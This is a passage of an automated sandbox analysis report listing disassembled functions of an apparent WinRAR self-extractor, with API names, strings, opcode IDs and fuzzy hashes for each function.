                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                  • Instruction ID: 39f7768878bea854b7db9a62b8cd4b20bdfd9d1783242f9e416067c4e4328a82
                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                  • Instruction Fuzzy Hash: CD51B032B2964286EB14CF11FCA5A393795FB40B89F5580B8EA9EC7749DF78E841C740
                                                  Function 00007FF6CA9CCEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastProcess_invalid_parameter_noinfo_noreturn$CloseCurrentHandleOpenToken
                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                  • API String ID: 4085542508-639343689
                                                  • Opcode ID: 56eb12e04902f8cdd3d9974dd122819d94118814fcd2e4f07e3976d6fdbba36c
                                                  • Instruction ID: db8e18866117d999dd6d4b4f0aa3fd16a172bcf2985a2b5fb06b2e3341705f3f
                                                  • Opcode Fuzzy Hash: 56eb12e04902f8cdd3d9974dd122819d94118814fcd2e4f07e3976d6fdbba36c
                                                  • Instruction Fuzzy Hash: 9251E852F28A5155FB10EFA5F8661BD2360AF857AAF000175DD9DD36A7DE3CA886C200
                                                  Function 00007FF6CA9E7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Rect
                                                  • String ID: RarHtmlClassName
                                                  • API String ID: 2396740005-1658105358
                                                  • Opcode ID: 953af82ac97f53ff3664e5cae13e18f5e39b1284c961c4c0c6c177a49c08ee6a
                                                  • Instruction ID: 50bf3c6f6a34f280704d0005b2736733942b8fdc15fc70ee0e4bc6769806fc31
                                                  • Opcode Fuzzy Hash: 953af82ac97f53ff3664e5cae13e18f5e39b1284c961c4c0c6c177a49c08ee6a
                                                  • Instruction Fuzzy Hash: A7518321A18B828AEA249F26F46537A77A0FB85782F044575DECEC7B56DF3CE0468740
                                                  Function 00007FF6CA9EFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                  • String ID: sfxcmd$sfxpar
                                                  • API String ID: 3540648995-3493335439
                                                  • Opcode ID: 3f2466e4a4d0866a754e80d9881e3536653d903d5d2b18ad3a3031b9ab7b11ad
                                                  • Instruction ID: a0c49159825ba54436c82f332e05dbaa26e6dedadec71d4192294c834a921f8b
                                                  • Opcode Fuzzy Hash: 3f2466e4a4d0866a754e80d9881e3536653d903d5d2b18ad3a3031b9ab7b11ad
                                                  • Instruction Fuzzy Hash: 27318332A24A4584EB04CF69F8A51AC3371FB48B99F540176DE9ED77AADF38D082C344
                                                  Function 00007FF6CA9EFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                  • API String ID: 0-56093855
                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                  • Instruction ID: 9e92ce899c858443fcbc1afa19897196dd075e2424bac4bc52d7883a36503add
                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                  • Instruction Fuzzy Hash: 31213B3191CB4780FA108F96F86917427A0BB49B86F5405B7D9CEC3762CE3CE5A68380
                                                  Function 00007FF6CA9FBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                  • Instruction ID: f86de02145837f429a8ca64a88613292cc5a4128aa051cfab7ee6e8e800e4ef1
                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                  • Instruction Fuzzy Hash: 03F06221A29A8281EF588F51F8642796360EF8C7D2F485079E98FC7665DF3CE486C700
                                                  Function 00007FF6CAA045C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                  • Instruction ID: 956ff7f84daff5dcf9ebe63535531fd5f906ed48c59251f009bde341b08982d8
                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                  • Instruction Fuzzy Hash: 6A81F322F186824EFB149FA5A8606BD2AA0BB55B8AF0041B5DD8FD3695DF3CE447C300
                                                  Function 00007FF6CA9D3AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2398171386-0
                                                  • Opcode ID: f75a2e2a3a1635b10ac7663bc56c733a9042ffa6b3fef8e66de610f6d5e077c2
                                                  • Instruction ID: 0e90ad692fe866f0105c43376b1c67067eb017856934fb1295283a1c606561de
                                                  • Opcode Fuzzy Hash: f75a2e2a3a1635b10ac7663bc56c733a9042ffa6b3fef8e66de610f6d5e077c2
                                                  • Instruction Fuzzy Hash: 2E51C122F24A4259FB508FB5F8612BE23B1AB487AAF004675DE9DC76D6DF3C9485C300
                                                  Function 00007FF6CAA03F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                  • String ID:
                                                  • API String ID: 3659116390-0
                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                  • Instruction ID: bb42f888778900f1fed3088a4eb4c697b36fd620254c2611f6b46857fea45e9a
                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                  • Instruction Fuzzy Hash: C451B232A14A918AF710CFA5E8543AC3BB1FB58B99F048175DE8E97B99DF38D146C700
                                                  Function 00007FF6CA9F1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocString
                                                  • String ID:
                                                  • API String ID: 262959230-0
                                                  • Opcode ID: 7e9601d2247a13adf5892490d0984888a090eff7ba9d3fa4ff308a8b8e371313
                                                  • Instruction ID: 1f6697b5847ff7603f4de2382566ee5bad0ce01fdd45b474b3e0d606738a985e
                                                  • Opcode Fuzzy Hash: 7e9601d2247a13adf5892490d0984888a090eff7ba9d3fa4ff308a8b8e371313
                                                  • Instruction Fuzzy Hash: D541D831A2964689EB149F65BC6137822A0EF08BA5F244678FBAEC77D6DF3CD0418340
                                                  Function 00007FF6CA9FF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID:
                                                  • API String ID: 190572456-0
                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                  • Instruction ID: 67cc2010e3d046d15052e4e55f4125804c32e837723f8457fa80421215021f31
                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                  • Instruction Fuzzy Hash: 33413722B29A4281FE158F56BD255752395BF08BD1F094579EE9FCB795EF3CE0018340
                                                  Function 00007FF6CAA056D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                  • Instruction ID: 4055e559c94920f52ddfabf1c597ecaa86035ddc9d18d2b33ebc5cc2a50da2d0
                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                  • Instruction Fuzzy Hash: F011C436E1C68781F65409A4F67537909416F453A2F58CAB0EAFF875D6CF2CA8436105
                                                  Function 00007FF6CA9F625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: __except_validate_context_recordabort
                                                  • String ID: csm$csm
                                                  • API String ID: 746414643-3733052814
                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                  • Instruction ID: 5022913aca20a4b3eb4a879f1900ab0b03138f59467fb2dea4966639661f40aa
                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                  • Instruction Fuzzy Hash: 247192726187C186D7609F25A8617BDBBA0EB05B8AF048179EFCCC7A86DF2CD491C740
                                                  Function 00007FF6CA9F80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: $*
                                                  • API String ID: 3215553584-3982473090
                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                  • Instruction ID: 90a03a65e0ed98d449970783f30dc405f171d90b0ee153c3b73718e03213a4af
                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                  • Instruction Fuzzy Hash: 92516B7292C6428AEBE48E28AC6E3BC3760FB15B5AF14517DE6C9C119ACF38F441C605
                                                  Function 00007FF6CAA01758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$StringType
                                                  • String ID: $%s
                                                  • API String ID: 3586891840-3791308623
                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                  • Instruction ID: 6871518134671d720d9f1b2d82831f8e69d6051e18f361ef4eb56c81151783f5
                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                  • Instruction Fuzzy Hash: 3441A422B15B818AEB208F65E8503F96391FB44BA9F480675EE9F877D5DF3CE5468300
                                                  Function 00007FF6CA9F66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                  • String ID: csm
                                                  • API String ID: 2466640111-1018135373
                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                  • Instruction ID: aa86c32cc6bfe000ea047e4cc2d5f5e6d68f50d602a3e2826a6889169c178154
                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                  • Instruction Fuzzy Hash: A6514E7262878187DA20DF15B8522AE77A4F789B91F140178EBCDC7B56CF38E450CB00
                                                  Function 00007FF6CAA04360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                  • String ID: U
                                                  • API String ID: 2456169464-4171548499
